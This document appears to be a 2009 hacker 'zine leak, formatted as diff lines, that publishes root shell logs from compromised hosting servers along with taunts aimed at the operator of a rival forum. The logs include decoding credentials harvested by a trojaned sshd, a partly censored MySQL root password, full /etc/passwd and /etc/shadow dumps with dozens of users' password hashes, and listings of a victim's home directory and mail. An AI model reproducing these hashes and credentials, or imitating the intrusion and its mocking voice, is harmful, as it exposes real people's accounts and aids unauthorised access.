+fmystic  pts/1        cpe-71-67-100-61 Wed Jun 24 23:27 - 00:14  (00:46)    
+butts    pts/0        puma.makosolutio Wed Jun 24 21:47 - 02:54  (05:07)    
+bwc05    pts/1        host-136-245.flt Wed Jun 24 00:18 - 00:18  (00:00)    
+
+wtmp begins Wed Apr 29 04:10:02 2009
+root@server [~]# 
+
+
+root@server [~]# lsof -i -n | grep ssh
+sshd      13173     root    3u  IPv6 496962909       TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
+sshd      13176      hsp    3u  IPv6 496962909       TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
+sshd      13285     root    3u  IPv6 496964091       TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
+sshd      13287 stephenm    3u  IPv6 496964091       TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
+sshd      13287 stephenm    7u  IPv4 505107114       TCP 64.191.54.229:53259->192.168.1.121:icslap (SYN_SENT)
+sshd      13287 stephenm    8u  IPv4 505106277       TCP 64.191.54.229:38749->192.121.86.4:http (SYN_SENT)
+sshd      30096     root    3u  IPv6 485663697       TCP *:ssh (LISTEN)
+root@server [~]# 
+
+
+root@server [/var/run]# gcc -o decode decode.c 
+͏Іʵroot@server [/var/run]# ./decode ssh.old 
+HOOKIN: falados:$.lWKq._censored_
+HOOKIN: smithah:_censored_
+.
+.
+.
+HOOKIN: karsh:vnm_censored_
+HOOKIN: karsh:vnm_censored_
+HOOKIN: smithah:Coverfir_censored_
+HOOKIN: karsh:vn_censored_
+HOOKIN: mrich:t23_censored_
+root@server [/var/run]# 
+
+root@server [/var/run]# hostname
+server.holeinthewallhosting.net
+root@server [/var/run]# uname -a
+Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 #1 SMP Tue Aug 5 07:41:53 EDT 2008 i686 i686 i386 GNU/Linux
+root@server [/var/run]# date
+Fri Jun 26 11:16:32 CDT 2009
+root@server [/var/run]# ifconfig -a
+eth0      Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.229  Bcast:64.191.54.239  Mask:255.255.255.240
+          inet6 addr: fe80::219:d1ff:fefb:459b/64 Scope:Link
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          RX packets:739777531 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:970111216 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000 
+          RX bytes:587506583 (560.2 MiB)  TX bytes:4170982921 (3.8 GiB)
+          Interrupt:217 Base address:0x2000 
+
+eth0:1    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.230  Bcast:64.191.54.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:2    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.231  Bcast:64.191.54.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:3    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.232  Bcast:64.191.54.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:4    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.54.233  Bcast:64.191.54.255  Mask:255.255.255.0
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:5    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.197  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:6    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.198  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:7    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.199  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:8    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.200  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:9    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.201  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:10   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.202  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:11   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.203  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:12   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.204  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:13   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.205  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth0:14   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
+          inet addr:64.191.36.206  Bcast:64.191.36.207  Mask:255.255.255.240
+          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+          Interrupt:217 Base address:0x2000 
+
+eth1      Link encap:Ethernet  HWaddr 00:50:04:6F:DA:43  
+          BROADCAST MULTICAST  MTU:1500  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:1000 
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+          Interrupt:217 Base address:0x8000 
+
+lo        Link encap:Local Loopback  
+          inet addr:127.0.0.1  Mask:255.0.0.0
+          inet6 addr: ::1/128 Scope:Host
+          UP LOOPBACK RUNNING  MTU:16436  Metric:1
+          RX packets:35636410 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:35636410 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:1453567506 (1.3 GiB)  TX bytes:1453567506 (1.3 GiB)
+
+sit0      Link encap:IPv6-in-IPv4  
+          NOARP  MTU:1480  Metric:1
+          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
+          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
+          collisions:0 txqueuelen:0 
+          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
+
+root@server [/var/run]# 
+
+
+root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 DlE46Y8KpH
+Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
+Rhosts authentication refused for %.100s: bad modes for %.200s
+Server has been configured to ignore %.100s.
+Accepted host %s ip %s client_user %s server_user %s
+HOOKIN: %s:%s
+DlE46Y8KpH
+root@server [/var/run]# 
+
+root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 0x3
+check_key_in_hostfiles: key %s for %s
+auth1.c
+sending challenge '%s'
+ ruser %.100s
+do_authloop: BN_new failed
+0x3aownt
+
+root@server [~]# cat .my.cnf 
+[client]
+user="root"
+pass=",a5.z_censored_"
+root@server [~]# 
+
+root@server [/tmp]# cd /var/run/
+root@server [/var/run]# ls
+./                 couriersslcache        dbus/               mdmpd/           pm/                 saslauthd/       tailwatchd.pid
+../                cpanellogd.pid         eximstats/          messagebus.pid   pop3d.pid           screen/          upcp.pid
+acpid.socket=      cpdavd.pid             ftpd.sock=          named/           pop3d.pid.lock      sdp=             utmp
+audispd_events=    cphulkd_detector.pid   haldaemon.pid       named.pid@       pop3d-ssl.pid       setrans/         winbindd/
+auditd.pid         cphulkd_processor.pid  imapd.pid           netreport/       pop3d-ssl.pid.lock  setroubleshoot/  wpa_supplicant/
+autofs.fifo-misc|  cphulkd.sock=          imapd.pid.lock      NetworkManager/  ppp/                spamd.pid
+autofs.fifo-net|   cpsrvd.pid             imapd-ssl.pid       nscd/            pure-authd.pid      sshd.pid
+avahi-daemon/      crond.pid              imapd-ssl.pid.lock  pcscd.comm=      pure-ftpd/          ssh.old
+chkservd/          cups/                  klogd.pid           pcscd.pid        pure-ftpd.pid       sudo/
+console/           cupsd.pid              mdadm/              pcscd.pub        rpc.statd.pid       syslogd.pid
+root@server [/var/run]# cd screen/
+root@server [/var/run/screen]# ls
+./  ../  S-root/
+root@server [/var/run/screen]# cd S-root/
+root@server [/var/run/screen/S-root]# ls
+./  ../  13472.pts-0.server|
+root@server [/var/run/screen/S-root]# cat 13472.pts-0.server
+
+
+root@server [/var/run/screen/S-root]# ls
+./  ../  13472.pts-0.server|
+root@server [/var/run/screen/S-root]# cd ..
+root@server [/var/run/screen]# ls
+./  ../  S-root/
+root@server [/var/run/screen]# ps -aux | grep -r screen
+Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
+root     25085  0.0  0.0   3920   700 pts/1    S+   11:27   0:00 grep -r screen
+root@server [/var/run/screen]# ps -aux | grep -i screen
+Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
+root     13472  0.0  0.0   5056  1064 ?        Ss   Jun10   0:00 SCREEN
+root     25147  0.0  0.0   3920   680 pts/1    R+   11:27   0:00 grep -i screen
+root@server [/var/run/screen]# 
+
+
+_______         ________________ 
+\   _  \ ___  __\   _  \______  \
+/  /_\  \\  \/  /  /_\  \  /    /
+\  \_/   \>    <\  \_/   \/    / 
+ \_____  /__/\_ \\_____  /____/  
+       \/      \/      \/        
+    .___             __           .__            .___                 
+  __| _/____ _______|  | __ _____ |__| ____    __| _/_______          
+ / __ |\__  \\_  __ \  |/ //     \|  |/    \  / __ |\___   /   ______ 
+/ /_/ | / __ \|  | \/    <|  Y Y  \  |   |  \/ /_/ | /    /   /_____/ 
+\____ |(____  /__|  |__|_ \__|_|  /__|___|  /\____ |/_____ \          
+     \/     \/           \/     \/        \/      \/      \/          
+          ____________   .________
+_________/ ____\   _  \  |   ____/
+\___   /\   __\/  /_\  \ |____  \ 
+ /    /  |  |  \  \_/   \/       \
+/_____ \ |__|   \_____  /______  /
+      \/              \/       \/ 
+
+
+                                           |
+                                       \       /            _\/_
+     darkmindz                           .-'-.              //o\  _\/_
+                                    --  /     \  --           |   /o\\
+  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
+     We eat the night, we drink the time                            |
+       Make our dreams come true
+         And hungry eyes are passing by
+           On streets we call the zoo
+
+Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
+the infamous saudi named RoMeO. Fortunetly due to the recent events RoMeO
+decided to kill his site and handle because he was sloppy & cocky enough to link
+his anti-sec activities with his public internet "life". This has spared us the
+trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
+We didn't want a good hax.log to go to waste so we decided to publish darkmindz
+anyways.
+
+RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
+that, but who the fuck is/was ssanz anyway and what's the point of spreading
+anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
+and run some retarded haxor forum at the same time pal, good to see that you
+realized that. But in any case if you decide to put your shitty forum online
+again, you will be rm'ed.
+
+Here's what we found in darkmindz land.
+
+root@www.darkmindz.com's password:
+Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
+ALERT! You are entering a secured area! Your IP and login information
+have been recorded. System administration has been notified.
+This system is restricted to authorized access only. All activities on
+this system are recorded and logged. Unauthorized access will be fully
+investigated and reported to the appropriate law enforcement agencies.
+
+root@server2:~[root@server2 ~]# uname -a; id
+Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT
+2009 x86_64 x86_64 x86_64 GNU/Linux
+uid=0(root) gid=0(root)
+groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
+root@server2:~[root@server2 ~]# #who up in this mother fucker
+root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+pcap:x:77:77::/var/arpwatch:/sbin/nologin
+mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+
+rpm:x:37:37::/var/lib/rpm:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+named:x:25:25:Named:/var/named:/sbin/nologin
+apache:x:100:500::/var/www:/bin/false
+diradmin:x:101:101::/usr/local/directadmin:/bin/bash
+mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
+webapps:x:500:501::/var/www/html:/bin/bash
+majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
+dovecot:x:104:104::/home/dovecot:/bin/bash
+admin:x:501:502::/home/admin:/bin/bash
+hrdev:x:502:503::/home/hrdev:/bin/false
+keytraderz:x:504:505::/home/keytraderz:/bin/false
+yourkicks:x:507:508::/home/yourkicks:/bin/false
+aaa:x:508:509::/home/aaa:/bin/false
+beyond:x:509:510::/home/beyond:/bin/false
+hotglow:x:510:511::/home/hotglow:/bin/false
+wheelglow:x:512:513::/home/wheelglow:/bin/false
+penguin:x:513:514::/home/penguin:/bin/false
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+furiogamin:x:516:517::/home/furiogamin:/bin/false
+kaza:x:517:518::/home/kaza:/bin/false
+pimpinjg:x:518:519::/home/pimpinjg:/bin/false
+dakilla:x:521:522::/home/dakilla:/bin/false
+bootroot:x:522:523::/home/bootroot:/bin/false
+scraft758:x:525:526::/home/scraft758:/bin/false
+hstrike:x:526:527::/home/hstrike:/bin/false
+romeo:x:528:529::/home/romeo:/bin/false
+xckx:x:529:530::/home/xckx:/bin/false
+h3mod:x:530:531::/home/h3mod:/bin/false
+clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
+avahi:x:70:70:Avahi daemon:/:/sbin/nologin
+avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
+hbxmike:x:535:536::/home/hbxmike:/bin/false
+wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
+haiobr:x:537:538::/home/haiobr:/bin/false
+odin:x:538:539::/home/odin:/bin/false
+sam:x:539:540::/home/sam:/bin/false
+mrgod:x:540:541::/home/mrgod:/bin/false
+pagewiz:x:541:542::/home/pagewiz:/bin/false
+zer0:x:542:543::/home/zer0:/bin/false
+dablitz:x:543:544::/home/dablitz:/bin/false
+ristop:x:544:545::/home/ristop:/bin/false
+bloo:x:545:546::/home/bloo:/bin/false
+root:$1$tilqrnIQ$fm2riVHK6dHchHIblFr/f1:14380:0:99999:7:::
+bin:*:14253:0:99999:7:::
+daemon:*:14253:0:99999:7:::
+shutdown:*:14253:0:99999:7:::
+halt:*:14253:0:99999:7:::
+mail:*:14253:0:99999:7:::
+ftp:*:14253:0:99999:7:::
+nobody:*:14253:0:99999:7:::
+dbus:!!:14253:0:99999:7:::
+nscd:!!:14253:0:99999:7:::
+vcsa:!!:14253:0:99999:7:::
+rpc:!!:14253:0:99999:7:::
+sshd:!!:14253:0:99999:7:::
+pcap:!!:14253:0:99999:7:::
+mailnull:!!:14253:0:99999:7:::
+smmsp:!!:14253:0:99999:7:::
+rpcuser:!!:14253:0:99999:7:::
+nfsnobody:!!:14253:0:99999:7:::
+rpm:!!:14253:0:99999:7:::
+haldaemon:!!:14253:0:99999:7:::
+named:!!:14257::::::
+apache:!!:14257::::::
+diradmin:!!:14256::::::
+mysql:!!:14256::::::
+webapps:!!:14256:0:99999:7:::
+majordomo:!!:14256::::::
+dovecot:!!:14256::::::
+admin:$1$hOf0pEJ7$Csc3Cf1boad5jK8A4.gCe1:14379:0:99999:7:::
+hrdev:$1$h66VePH.$Q18XKJHV0qQekrkx8DNPa.:14269:0:99999:7:::
+keytraderz:$1$apmWxy/L$YuzBwBVn6o87A7gAqMUfj0:14369:0:99999:7:::
+yourkicks:$1$IeMgb1QU$qNEVNIQDzjgW5Wt.V5cNs.:14269:0:99999:7:::
+aaa:$1$Pvq5Ze1q$Nn1bNt8aTVT7VaBCZFuMr1:14269:0:99999:7:::
+beyond:$1$gYlYPXOA$qMQTQ0gTMkqkeI3exuI5F0:14269:0:99999:7:::
+hotglow:$1$UL8Osrrl$pKpDOHKiBcj2a5NBN1n1M1:14269:0:99999:7:::
+wheelglow:$1$7CfmCRZb$TXXEzsFamBKkk7L10qKEn1:14269:0:99999:7:::
+penguin:!$1$NKcb5Ati$z.YERAUu8ADbbo8XId6.e.:14269:0:99999:7:::
+ntp:!!:14273::::::
+furiogamin:$1$ehClK7ld$2OchIgSTZ1wnYgJnWJe1L/:14278:0:99999:7:::
+kaza:$1$QU9IN8sS$cypmbg45B0V0k/a6knhzD0:14278:0:99999:7:::
+pimpinjg:$1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1:14291:0:99999:7:::
+dakilla:$1$Foh0gQdF$NDc4LO/3Otwxt.WXNGb8u1:14383:0:99999:7:::
+bootroot:$1$YG4ZItt0$JYuixhSHo9KcJbdm4rumt.:14364:0:99999:7:::
+scraft758:$1$BD72wrXX$3SarFSWt249OF71EugOvp1:14292:0:99999:7:::
+hstrike:$1$roWSxdvs$X6QfaV/NhsXwqBCTFksL/0:14292:0:99999:7:::
+romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
+xckx:$1$NsnILOqK$3mGncK6wPMYMsb9vnkOyt/:14293:0:99999:7:::
+h3mod:$1$XQo0rcc3$lmySsVMTrIC0ePWPXfOR2/:14293:0:99999:7:::
+clamav:!!:14336:0:99999:7:::
+avahi:!!:14336::::::
+avahi-autoipd:!!:14336::::::
+hbxmike:$1$PriF/4Bk$1.j6gBej9aPfrN4BJeDU11:14376:0:99999:7:::
+wtfsmilez:$1$NJsG5rdb$X.EqYJhBhWhuAjteubXEK/:14365:0:99999:7:::
+haiobr:$1$8WRmEqZ.$.shT4ddM9WHSteJ197DjE1:14385:0:99999:7:::
+odin:$1$z5xA/a5f$x4VoN/NQhQshmAei3bZj4.:14379:0:99999:7:::
+sam:$1$hQ9R7M26$pDBdZDh01EtAV1DxELrnc1:14376:0:99999:7:::
+mrgod:$1$WmNO8283$hpvrrWLnd5Pp/RlcwYvnm/:14377:0:99999:7:::
+pagewiz:$1$LgyU4TyH$kpQ.QEZ3mVv.nZQKvzrui0:14383:0:99999:7:::
+zer0:$1$KMAddC48$OTyb50QllFSKp4AR4AcsC0:14385:0:99999:7:::
+dablitz:$1$xUPbImWk$hDT9R4UAwbsQVyGxpZ.pu/:14386:0:99999:7:::
+ristop:$1$9SfY3MtY$n8cHnCN6tY2WvhitNOykh.:14386:0:99999:7:::
+bloo:$1$TtV5Q9IB$gi9SWdREB1ikky.Cgmiuu/:14387:0:99999:7:::
+root@server2:~[root@server2 ~]# grep romeo /etc/shadow
+romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
+root@server2:~[root@server2 ~]# w
+ 04:05:41 up 18:48,  1 user,  load average: 0.34, 0.34, 0.23
+USER	 TTY	  FROM		    LOGIN@   IDLE   JCPU   PCPU WHAT
+root	 pts/0	  cpe-76-1x5-xx-xx 03:39   26:24   0.00s  0.00s -bash
+root@server2:~[root@server2 ~]# ls -al
+total 30488
+drwxr-x--- 11 root    root	 4096 May 23 02:47 .
+drwx--x--x 25 root    root	 4096 May 22 09:26 ..
+-rw-------  1 root    root	 1132 Mar 11 01:44 anaconda-ks.cfg
+-rw-r--r--  1 root    root	    0 May 20 17:26 authorized_keys2
+-rwxr-xr-x  1 root    root	   10 May 23 03:02 .bash_history
+-rw-r--r--  1 root    root	   24 Jan  6  2007 .bash_logout
+-rw-r--r--  1 root    root	  191 Jan  6  2007 .bash_profile
+-rw-r--r--  1 root    root	  176 Jan  6  2007 .bashrc
+drwxrwxrwx 24	 1000	1000	 4096 Apr 28 14:55 clamav-0.95.1
+-rw-r--r--  1 root    root   24260964 Apr  8 08:24 clamav-0.95.1.tar.gz
+-rw-r--r--  1 root    root     171053 May 22 13:49 cleaned_shells_php.txt
+drwxr-xr-x  4 root    root	 4096 Mar 18 00:50 .cpan
+-rw-r--r--  1 root    root	  100 Jan  6  2007 .cshrc
+-rw-r--r--  1 root    root	    4 Jan 12 16:21 .custombuild
+-rwxr-xr-x  1 root    root	21171 Jan 13 14:13 da.cpanel.import.pl
+-rw-r--r--  1 root    root	  288 Mar 31 05:21 defaults.conf
+drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 export
+-rw-r--r--  1 root    root	 1155 May 15 22:15 f.c
+drwxr-xr-x  3 root    root	 4096 May 12 20:35 forum
+-rw-r--r--  1 root    root	  265 May 14 15:19 ifconfig
+drwxr-xr-x  2 root    root	 4096 Mar 23 19:03 import
+-rw-------  1 root    root	12288 Mar 27 04:26 .import.swp
+-rw-r--r--  1 root    root	 1724 Apr  1 18:53 initsec
+-rw-------  1 root    root	   97 May 23 04:02 .lesshst
+-rw-r--r--  1 root    root	   27 May 23 02:35 load
+-rw-------  1 root    root	   42 Feb  5 17:18 .my.cnf
+-rw-------  1 root    root	   37 May  2 15:19 .mysql_history
+-rw-r--r--  1 root    root	    9 Mar 31 05:21 .mytop
+drwxr-xr-x 16 webapps apache	 4096 Apr 28 16:11 nmap-4.85BETA8
+-rw-r--r--  1 root    root    6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
+drwxr-xr-x  3 root    root	 4096 May 20 14:31 qurantine
+-rw-------  1 root    root	 1024 Apr  2 18:01 .rnd
+-rwxr-xr-x  1 root    root	 2024 Apr 28 14:44 scan.pl
+drwx------  2 root    root	 4096 May 20 15:00 .ssh
+-rw-r--r--  1 root    root	  129 Jan  6  2007 .tcshrc
+-rw-------  1 root    root	12288 May 23 03:02 .test.swp
+drwxr-xr-x  2 root    root	 4096 May 14 14:00 tmp
+-rwxr-xr-x  1 root    root	47429 May 16  2008 tuning-primer.sh
+root@server2:~[root@server2 ~]# cat .bash_history
+exit
+exit
+root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
+root@server2:~[root@server2 ~]# date
+Sat May 23 04:06:57 PDT 2009
+root@server2:~[root@server2 ~]# cd /home/romeo/
+root@server2:/home/romeo[root@server2 romeo]# ls -al
+total 44
+drwx--x--x  6 romeo romeo 4096 Apr 22 15:51 .
+drwx--x--x 36 root  root  4096 May 23 02:33 ..
+drwx------  2 romeo romeo 4096 Feb 17 16:07 backups
+-rw-r--r--  1 romeo romeo   33 Dec 22 09:57 .bash_logout
+-rw-r--r--  1 romeo romeo  176 Dec 22 09:57 .bash_profile
+-rw-r--r--  1 romeo romeo  124 Dec 22 09:57 .bashrc
+-rw-------  1 romeo romeo    0 Feb  8 08:45 .clipboard.txt
+drwx--x--x  4 romeo romeo 4096 Dec 23 14:31 domains
+drwxrwx---  4 romeo mail  4096 Feb 17 16:07 imap
+drwxrwx---  5 romeo mail  4096 Dec 23 08:29 Maildir
+lrwxrwxrwx  1 romeo romeo   35 Feb 17 16:07 public_html ->
+./domains/darkmindz.com/public_html
+-rw-r-----  1 romeo mail    34 Apr 19 16:26 .shadow
+root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
+4.0K	Maildir/tmp
+68M	Maildir/new
+4.0K	Maildir/cur
+68M	Maildir/
+68M	total
+root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
+root@server2:/home/romeo[root@server2 romeo]# cd domains
+root@server2:/home/romeo/domains[root@server2 domains]# ls -la
+total 16
+drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
+drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
+drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
+drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
+root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
+root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls
+-la
+total 40
+drwx--x--x  7 romeo romeo  4096 Apr 22 15:53 .
+drwx--x--x  4 romeo romeo  4096 Dec 23 14:31 ..
+drwxr-xr-x  2 romeo romeo  4096 Dec 22 09:57 .htpasswd
+drwxr-xr-x  2 root  root   4096 May 23 00:10 logs
+drwx--x--x  3 romeo romeo  4096 Dec 22 09:57 public_ftp
+drwxr-xr-x 15 romeo romeo  4096 May 20 14:30 public_html
+drwxr-xr-x  2 root  root   4096 May  1 00:10 stats
+-rw-r--r--  1 romeo romeo 12151 Feb  9 09:01 view_topic.php
+root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd
+public_html/
+root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
+public_html]# ls -al
+total 47264
+drwxr-xr-x 15 romeo romeo     4096 May 20 14:30 .
+drwx--x--x  7 romeo romeo     4096 Apr 22 15:53 ..
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 400.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 401.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 403.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 404.shtml
+-rwxr-xr-x  1 romeo romeo      515 May	7  2007 500.shtml
+-rw-r--r--  1 romeo romeo     5254 Feb 14 06:12 acp.php
+-rw-r--r--  1 romeo romeo     9757 Feb 14 06:12 ajax.php
+-rw-r--r--  1 romeo romeo     2118 Feb 14 06:12 articles.php
+drwxr-xr-x  2 romeo romeo     4096 Mar	4 11:11 _beta
+drwxrwxrwx  5 romeo romeo     4096 Mar 26 15:55 cache
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 09:57 cgi-bin
+-rw-r--r--  1 romeo romeo     5561 Feb 14 06:12 challenges.php
+-rw-r--r--  1 romeo romeo     2137 Feb	2 08:43 codebase.php
+-rw-r--r--  1 romeo romeo    17251 Jan 13 07:21 convertor.php
+drwxr-xr-x  6 romeo romeo     4096 Feb	7 13:38 core
+-rw-r--r--  1 romeo romeo	 0 Jan 13 07:21 debug
+-rw-r--r--  1 romeo romeo     3266 Dec 22 22:59 eg.gif
+-rw-r--r--  1 romeo romeo     5036 Feb 27 17:58 forgotpass.php
+-rw-r--r--  1 romeo romeo     7107 Mar	1 11:30 forum.php
+-rw-r--r--  1 romeo romeo     2177 Jan 13 07:21 get_shouts.php
+-rw-r--r--  1 romeo romeo  1416102 Feb 17 14:24 halo.zip
+-rw-r--r--  1 romeo romeo     4546 Feb 19 14:07 .htaccess
+-rw-r--r--  1 romeo romeo	36 Jan 13 06:52 .htpasswd
+drwxr-xr-x  4 romeo romeo     4096 Feb	8 20:35 images
+drwxr-xr-x  2 romeo romeo     4096 Dec 22 22:20 img
+-rw-r--r--  1 romeo romeo     3998 Apr 19 16:40 index.php
+-rw-r--r--  1 romeo romeo      843 Feb 28 15:13 irc.php
+drwxr-xr-x  3 romeo romeo     4096 Feb	7 13:38 language
+-rw-r--r--  1 romeo romeo     4103 Feb 19 14:05 latest_posts.php
+-rwxrwxrwx  1 romeo romeo     7184 Feb 14 06:12 loader.php
+-rw-r--r--  1 romeo romeo     8398 Feb 14 06:12 login.php
+-rwxr-xr-x  1 romeo romeo    13954 Sep 15  2006 logo.jpg
+-rw-r--r--  1 romeo romeo     3006 Feb	1 21:44 merge.php
+drwxr-xr-x 20 romeo romeo     4096 Feb 12 13:44 modules
+-rw-r--r--  1 romeo romeo    10964 Feb 14 12:40 pastebin.php
+-rw-r--r--  1 romeo romeo    31019 Feb 14 06:12 post.bak.php
+-rw-r--r--  1 romeo romeo    35322 Feb 21 08:56 post.php
+-rw-r--r--  1 romeo romeo     2142 Feb 14 06:12 privatemessages.php
